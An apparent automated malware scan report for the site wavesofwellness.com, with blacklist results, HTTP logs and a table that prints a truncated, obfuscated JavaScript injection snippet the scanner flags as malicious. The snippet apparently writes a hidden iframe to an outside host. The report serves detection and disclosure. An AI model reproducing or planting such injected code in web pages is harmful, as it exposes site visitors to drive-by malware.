Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wavesofwellness.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wavesofwellness.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wavesofwellness.com/ | 200 OK Content-Length: 15384 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}
if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60 Antivirus reports:
| ||
http://wavesofwellness.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wavesofwellness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 23:52:37 GMT
Accept-Ranges: bytes
ETag: "c179275f-3c18-4e52bead572e3"
Server: Apache
Content-Length: 15384
Content-Type: text/html
Last-Modified: Fri, 30 Aug 2013 15:31:33 GMT
...15384 bytes of data.
GET / HTTP/1.1
Host: wavesofwellness.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 23:52:37 GMT
Accept-Ranges: bytes
ETag: "c179275f-3c18-4e52bead572e3"
Server: Apache
Content-Length: 15384
Content-Type: text/html
Last-Modified: Fri, 30 Aug 2013 15:31:33 GMT
...15384 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wavesofwellness.com
Referer: http://www.google.com/search?q=wavesofwellness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wavesofwellness.com
Referer: http://www.google.com/search?q=wavesofwellness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.